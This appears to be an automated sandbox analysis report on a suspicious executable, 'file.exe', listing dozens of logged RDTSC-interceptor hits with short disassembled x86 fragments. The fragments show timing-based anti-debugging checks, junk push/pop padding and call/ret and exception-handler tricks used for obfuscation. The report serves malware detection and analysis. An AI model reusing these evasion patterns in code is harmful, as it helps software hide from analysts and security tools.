                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FC939 second address: 13FC955 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11F8F18C37h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FD1E9 second address: 13FD21D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11F8D51844h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F11F8D51844h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1401F81 second address: 1401F85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1401F85 second address: 1401F92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1401F92 second address: 1401F97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1403DF6 second address: 1403E0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 ja 00007F11F8D51836h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1401F97 second address: 1402036 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F11F8F18C28h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d add ebx, dword ptr [ebp+122D3918h] 0x00000013 push dword ptr fs:[00000000h] 0x0000001a push 00000000h 0x0000001c push esi 0x0000001d call 00007F11F8F18C28h 0x00000022 pop esi 0x00000023 mov dword ptr [esp+04h], esi 0x00000027 add dword ptr [esp+04h], 0000001Bh 0x0000002f inc esi 0x00000030 push esi 0x00000031 ret 0x00000032 pop esi 0x00000033 ret 0x00000034 jmp 00007F11F8F18C32h 0x00000039 mov dword ptr fs:[00000000h], esp 0x00000040 cmc 0x00000041 mov eax, dword ptr [ebp+122D10BDh] 0x00000047 mov dword ptr [ebp+12456AF6h], edi 0x0000004d push FFFFFFFFh 0x0000004f push 00000000h 0x00000051 push eax 0x00000052 call 00007F11F8F18C28h 0x00000057 pop eax 0x00000058 mov dword ptr [esp+04h], eax 0x0000005c add dword ptr [esp+04h], 00000018h 0x00000064 inc eax 0x00000065 push eax 0x00000066 ret 0x00000067 pop eax 0x00000068 ret 0x00000069 jmp 00007F11F8F18C35h 0x0000006e nop 0x0000006f pushad 0x00000070 pushad 0x00000071 push eax 0x00000072 push edx 0x00000073 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1403E0A second address: 1403E0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1402036 second address: 140205B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11F8F18C38h 0x00000009 popad 0x0000000a jng 00007F11F8F18C2Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1403E0E second address: 1403E7B instructions: 0x00000000 rdtsc 0x00000002 jno 00007F11F8D51836h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F11F8D51838h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 00000017h 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 mov dword ptr [ebp+122D2F75h], ecx 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push edi 0x00000031 call 00007F11F8D51838h 0x00000036 pop edi 0x00000037 mov dword ptr [esp+04h], edi 0x0000003b add dword ptr [esp+04h], 00000015h 0x00000043 inc edi 0x00000044 push edi 0x00000045 ret 0x00000046 pop edi 0x00000047 ret 0x00000048 push 00000000h 0x0000004a mov ebx, dword ptr [ebp+122D198Fh] 0x00000050 mov dword ptr [ebp+1246719Bh], esi 0x00000056 push eax 0x00000057 jng 00007F11F8D51842h 0x0000005d jp 00007F11F8D5183Ch 0x00000063 push eax 0x00000064 push edx 0x00000065 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1405EA4 second address: 1405EAA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1404F36 second address: 1404F4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11F8D5183Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1405EAA second address: 1405EAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1404F4C second address: 1404F53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1404F53 second address: 1404F6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F11F8F18C38h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1406CBD second address: 1406CD8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11F8D51847h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1406CD8 second address: 1406D01 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F11F8F18C2Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d jmp 00007F11F8F18C34h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1406D01 second address: 1406D1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F11F8D51846h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1406D1E second address: 1406D80 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007F11F8F18C28h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 00000014h 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 sbb ebx, 1AB2B55Fh 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push eax 0x0000002d call 00007F11F8F18C28h 0x00000032 pop eax 0x00000033 mov dword ptr [esp+04h], eax 0x00000037 add dword ptr [esp+04h], 0000001Bh 0x0000003f inc eax 0x00000040 push eax 0x00000041 ret 0x00000042 pop eax 0x00000043 ret 0x00000044 push 00000000h 0x00000046 mov edi, dword ptr [ebp+122D3920h] 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f jl 00007F11F8F18C28h 0x00000055 pushad 0x00000056 popad 0x00000057 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1407CF4 second address: 1407CFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1406EDB second address: 1406EE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1407EFC second address: 1407F78 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a xor bx, 7F37h 0x0000000f push dword ptr fs:[00000000h] 0x00000016 mov di, 6AA4h 0x0000001a mov dword ptr fs:[00000000h], esp 0x00000021 mov dword ptr [ebp+122D1ABDh], ebx 0x00000027 mov eax, dword ptr [ebp+122D0F05h] 0x0000002d push 00000000h 0x0000002f push edx 0x00000030 call 00007F11F8D51838h 0x00000035 pop edx 0x00000036 mov dword ptr [esp+04h], edx 0x0000003a add dword ptr [esp+04h], 00000017h 0x00000042 inc edx 0x00000043 push edx 0x00000044 ret 0x00000045 pop edx 0x00000046 ret 0x00000047 push FFFFFFFFh 0x00000049 push 00000000h 0x0000004b push esi 0x0000004c call 00007F11F8D51838h 0x00000051 pop esi 0x00000052 mov dword ptr [esp+04h], esi 0x00000056 add dword ptr [esp+04h], 00000015h 0x0000005e inc esi 0x0000005f push esi 0x00000060 ret 0x00000061 pop esi 0x00000062 ret 0x00000063 mov ebx, dword ptr [ebp+122D2662h] 0x00000069 add edi, dword ptr [ebp+122D3778h] 0x0000006f push eax 0x00000070 pushad 0x00000071 push eax 0x00000072 push eax 0x00000073 push edx 0x00000074 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1407F78 second address: 1407F80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140ADCE second address: 140ADD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140ADD2 second address: 140ADD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140ADD6 second address: 140ADDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1408F0F second address: 1408F19 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F11F8F18C26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140ADDC second address: 140ADE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1408F19 second address: 1408F46 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F11F8F18C3Eh 0x00000008 jmp 00007F11F8F18C38h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jp 00007F11F8F18C40h 0x00000016 push eax 0x00000017 push edx 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140BFAA second address: 140BFB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140BFB0 second address: 140BFB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140BFB5 second address: 140BFD0 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F11F8D5183Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F11F8D51838h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140D0AD second address: 140D113 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F11F8F18C28h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 push 00000000h 0x00000026 mov bh, dl 0x00000028 push 00000000h 0x0000002a mov edi, dword ptr [ebp+122D1ABDh] 0x00000030 xchg eax, esi 0x00000031 push eax 0x00000032 pushad 0x00000033 pushad 0x00000034 popad 0x00000035 jmp 00007F11F8F18C38h 0x0000003a popad 0x0000003b pop eax 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007F11F8F18C32h 0x00000044 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140EFB7 second address: 140EFCD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007F11F8D5183Ch 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140FF4D second address: 140FF51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140C153 second address: 140C15D instructions: 0x00000000 rdtsc 0x00000002 jg 00007F11F8D5183Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1410007 second address: 1410010 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1410010 second address: 1410021 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a js 00007F11F8D51836h 0x00000010 pop edi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140C15D second address: 140C1E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007F11F8F18C28h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 0000001Ch 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 call 00007F11F8F18C39h 0x00000028 mov ebx, dword ptr [ebp+122D1A6Ch] 0x0000002e pop ebx 0x0000002f push dword ptr fs:[00000000h] 0x00000036 mov dword ptr fs:[00000000h], esp 0x0000003d cld 0x0000003e mov eax, dword ptr [ebp+122D0D21h] 0x00000044 push edx 0x00000045 mov ebx, 42EDFB32h 0x0000004a pop edi 0x0000004b push FFFFFFFFh 0x0000004d mov bx, 2784h 0x00000051 mov bh, A3h 0x00000053 nop 0x00000054 jmp 00007F11F8F18C32h 0x00000059 push eax 0x0000005a pushad 0x0000005b push eax 0x0000005c push edx 0x0000005d push ebx 0x0000005e pop ebx 0x0000005f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140B076 second address: 140B07B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1410184 second address: 1410189 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140F1A0 second address: 140F1B1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jnp 00007F11F8D51836h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BE9F3 second address: 13BE9F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1410189 second address: 1410231 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F11F8D51840h 0x00000008 jmp 00007F11F8D5183Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007F11F8D51838h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 0000001Ah 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a push dword ptr fs:[00000000h] 0x00000031 jc 00007F11F8D51840h 0x00000037 jmp 00007F11F8D5183Ah 0x0000003c mov dword ptr fs:[00000000h], esp 0x00000043 jne 00007F11F8D5183Ch 0x00000049 sub di, EFD1h 0x0000004e mov eax, dword ptr [ebp+122D0D45h] 0x00000054 jmp 00007F11F8D51842h 0x00000059 push FFFFFFFFh 0x0000005b push 00000000h 0x0000005d push edi 0x0000005e call 00007F11F8D51838h 0x00000063 pop edi 0x00000064 mov dword ptr [esp+04h], edi 0x00000068 add dword ptr [esp+04h], 00000019h 0x00000070 inc edi 0x00000071 push edi 0x00000072 ret 0x00000073 pop edi 0x00000074 ret 0x00000075 push eax 0x00000076 push eax 0x00000077 push edx 0x00000078 push eax 0x00000079 push edx 0x0000007a pushad 0x0000007b popad 0x0000007c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140F1B1 second address: 140F1B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BE9F7 second address: 13BEA26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 push ebx 0x0000000a jmp 00007F11F8D51842h 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 jmp 00007F11F8D5183Fh 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1410231 second address: 1410235 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1410235 second address: 141023B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140F1B5 second address: 140F24E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007F11F8F18C28h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 mov dword ptr [ebp+122D3317h], ecx 0x00000028 push dword ptr fs:[00000000h] 0x0000002f mov di, FB69h 0x00000033 mov dword ptr fs:[00000000h], esp 0x0000003a jmp 00007F11F8F18C30h 0x0000003f mov eax, dword ptr [ebp+122D068Dh] 0x00000045 sub dword ptr [ebp+122D1B2Ch], edi 0x0000004b push FFFFFFFFh 0x0000004d push 00000000h 0x0000004f push edi 0x00000050 call 00007F11F8F18C28h 0x00000055 pop edi 0x00000056 mov dword ptr [esp+04h], edi 0x0000005a add dword ptr [esp+04h], 0000001Dh 0x00000062 inc edi 0x00000063 push edi 0x00000064 ret 0x00000065 pop edi 0x00000066 ret 0x00000067 je 00007F11F8F18C2Ch 0x0000006d sub dword ptr [ebp+122D197Fh], ecx 0x00000073 push eax 0x00000074 push eax 0x00000075 push edx 0x00000076 pushad 0x00000077 push eax 0x00000078 push edx 0x00000079 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140F24E second address: 140F262 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F11F8D5183Fh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141B541 second address: 141B554 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 je 00007F11F8F18C32h 0x0000000b jne 00007F11F8F18C26h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141B554 second address: 141B558 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141AC89 second address: 141AC8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141AC8F second address: 141ACA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edi 0x00000008 jng 00007F11F8D5184Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141ACA1 second address: 141ACA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141ADF7 second address: 141ADFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141ADFB second address: 141AE05 instructions: 0x00000000 rdtsc 0x00000002 js 00007F11F8F18C2Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141AE05 second address: 141AE0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141AE0F second address: 141AE13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141AF8A second address: 141AF8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141AF8E second address: 141AF9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141AF9C second address: 141AFA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141B0FC second address: 141B102 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 141B102 second address: 141B112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14210B7 second address: 14210BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14210BD second address: 14210CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F11F8D51836h 0x0000000a popad 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1427A72 second address: 1427A8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11F8F18C34h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1427A8A second address: 1427A95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1427A95 second address: 1427A9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1427A9B second address: 1427ABA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 jmp 00007F11F8D51845h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B2D85 second address: 13B2D8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1426D00 second address: 1426D0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F11F8D51836h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14272FB second address: 1427313 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jnc 00007F11F8F18C26h 0x00000010 jp 00007F11F8F18C26h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1427491 second address: 14274B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F11F8D51845h 0x00000008 jp 00007F11F8D51836h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
